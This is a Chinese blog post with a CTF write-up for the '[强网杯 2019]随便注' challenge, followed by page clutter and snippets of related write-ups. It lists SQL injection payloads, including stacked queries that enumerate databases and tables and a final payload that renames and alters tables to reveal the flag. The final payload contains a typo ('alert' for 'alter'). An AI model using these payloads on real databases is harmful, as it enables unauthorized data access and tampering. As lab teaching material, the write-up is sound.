[强网杯 2019]随便注

最新推荐文章于 2024-04-07 15:17:11 发布
最新推荐文章于 2024-04-07 15:17:11 发布
阅读量3.5k 收藏 1
点赞数
分类专栏: BUUCTF SQL注入 文章标签: sql 安全架构 安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45888826/article/details/122665272
版权

1.看到输入框,尝试进行sql语句注入

2. 先用1' or 1=1 #看到有回显

3.现用orderby看看有几个字段 用到1' order by 3 #时报错

error 1054 : Unknown column '3' in 'order clause'

4.字段数2个,试试union注入,看到

 

发现过滤了select where 
 

5.还可以用堆叠注入,用分号当作两条语句执行
 

1'; show databases; #
 

 

 6.看到了一堆库,先查查表吧
 

1'; show tables; #
 

 

 7.两个表,先看words表字段
 

1'; show columns from words; #
 

 

 8.再看看另一个表,数字表要加反引号
 

1'; show columns from `1919810931114514 `; #
 

 

 9.看到了flag,但是select被过滤,学习别的大佬是用改名的方式,查出flag
 

借鉴大佬博客:(19条消息) SQL Injection8(堆叠注入)——强网杯2019随便注_kid的博客-CSDN博客_强网杯2019随便注
 

1,通过 rename 先把 words 表改名为其他的表名。
 

2,把 1919810931114514 表的名字改为 words 。
 

3 ,给新 words 表添加新的列名 id 。
 

4,将 flag 改名为 data 。 
 

 

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

 

 

 

再用1’ or 1=1 #查出flag
 

 
 

 10.大佬就是办法多,这题很精髓

                

        

        

    




    

      

        

            

              
                
                  Affectedfish
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
【BUUCTF】web强网杯2019随便

				
			

			

				

					12-14
				

			

		

		

			
				
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所

			
		

	



                

              
                



	

		

			

				
					
[强网杯 2019]随便.docx

				
			

			

				

					12-18
				

			

		

		

			
				
强网杯

			
		

	



                


  
              

                


	

		

			

				
					
BUUCTF Web [强网杯 2019]随便

					
热门推荐

				
			

			

				

					wangyuxiang946的博客
				

				

					10-25
					
					1万+
					
				

			

		

		

			
				
「作者主页」:士别三日wyx
  此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程
「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。

[强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结
一、题目简介
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。

在输入框中输入一个2,即可.

			
		

	





	

		

			

				
					
[SQL入][强网杯 2019]随便(三种姿势)

				
			

			

				

					Y4tacker的博客
				

				

					08-05
					
					8098
					
				

			

		

		

			
				
文章目录姿势一 ---- 常规堆叠入姿势二---预处理语句姿势三 --- handeler参考文章
前言:
1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关
姿势一 ---- 常规堆叠入
堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。
首先老规矩输入1

加个单引号,报错

释掉后面大概猜到表的结构了selsect id,data from words where id =,并

			
		

	



		

			
		



	

		

			

				
					
buuctf [强网杯 2019]随便 1

				
			

			

				

					weixin_45642610的博客
				

				

					01-07
					
					1万+
					
				

			

		

		

			
				
buuctf web [强网杯 2019]随便 1 -刷题个人日记
小白一个,写给自己看。
打开后是这样。
从题目和内容来看就是一道sql入题。
输入
1' or 1=1;#

这个#用来释掉后面的sql语句

显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。
输入
1' order by 2;#   
1' order by 3;#   


到第3列报错,说明只显示两列。
输入1'; show tables;#

可以看到有	191981093

			
		

	





	

		

			

				
					
[强网杯2019]随便(初学者看过来)

				
			

			

				

					xiaobu30的博客
				

				

					11-15
					
					5075
					
				

			

		

		

			
				
这是一道web方向的sql入的题目,通过借鉴各位大佬的博客,我给大家分享我学到的几种方法。

查询 “1” 的时候,会有回显

使用单引号闭合,尝试 “1' and 1 = 2#” (可以将这个理解为万能密码,#会将后面的语句释掉) , 发现无回显

仅使用单引号入发现会报sql语法错误



第一种:
...

			
		

	





	

		

			

				
					
强网杯 WriteUp By Nu1L

				
			

			

				

					08-02
				

			

		

		

			
				
2022年第六届“强网杯”全国网络安全挑战赛

			
		

	





	

		

			

				
					
强网杯2021 Web.zip

				
			

			

				

					12-17
				

			

		

		

			
				
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...

			
		

	





	

		

			

				
					
2019 第三届强网杯线上赛.zip

				
			

			

				

					12-17
				

			

		

		

			
				
强网杯

			
		

	





	

		

			

				
					
强网杯2022 pwn 赛题解析.docx

				
			

			

				

					12-18
				

			

		

		

			
				
强网杯2022 Pwn赛题解析】  在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...

			
		

	





	

		

			

				
					
2021年强网杯赛题.zip

				
			

			

				

					12-17
				

			

		

		

			
				
强网杯

			
		

	





	

		

			

				
					
2018强网杯CTF-题目整理-校本图片Readme.zip

				
			

			

				

					12-18
				

			

		

		

			
				
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...

			
		

	





	

		

			

				
					
2018强网杯CTF-题目整理.zip

				
			

			

				

					12-17
				

			

		

		

			
				
2018强网杯CTF___题目整理

			
		

	





	

		

			

				
					
2022强网杯web(部分).docx

				
			

			

				

					12-18
				

			

		

		

			
				
强网杯

			
		

	





	

		

			

				
					
[强网杯 2019]随便1

				
			

			

				

					m0_75178803的博客
				

				

					11-05
					
					212
					
				

			

		

		

			
				
打开题目输入1输入1',页面报错,输入1' #页面正常说明1为入点且入方式为字符型的单引号入判断列名输入1' order by 2 # 页面正常1' order by 3 #页面报错说明列名字段数为2接下来我们尝试用联合入的方式爆出数据显示位输入1' union select 1,2 #可以看到过滤了很多东西说明我们用不了联合入,因为过滤了union我们尝试堆叠入来查看有多少个数据库1';我们查看表名1';可以看到当前数据库下有两个表1';

			
		

	





	

		

			

				
					
[强网杯 2019]随便1 解题思路(详细版)

				
			

			

				

					qq_61861243的博客
				

				

					09-24
					
					280
					
				

			

		

		

			
				
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。

			
		

	





	

		

			

				
					
buuctf web题解之[强网杯 2019]随便1详解,网络安全开发了解这些自然无惧面试

					
最新发布

				
			

			

				

					m0_60666841的博客
				

				

					04-07
					
					266
					
				

			

		

		

			
				
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!

			
		

	





	

		

			

				
					
[强网杯 2019]随便 堆叠

				
			

			

				

					YUK_103的博客
				

				

					04-12
					
					573
					
				

			

		

		

			
				
大纲技能点分析过程这里是我的做法其他做法以上
技能点
堆叠入
分析过程

首先是这么一个界面,如果你再这个表单的框里提交的话在url框上会显示加号比如 12 32 4 ⇒inject=12+32+4 。那么我们就直接在url框里入即可。
然后接着 ?inject=1’ order by 2# 发现报错怀疑是“#”被过滤了,换成 --+后正常访问

由于order by 3报错,那么常规套路:1...

			
		

	





	

		

			

				
					
buuctf-强网杯2019随便

				
			

			

				

					09-03
				

			

		

		

			
				
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。  入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值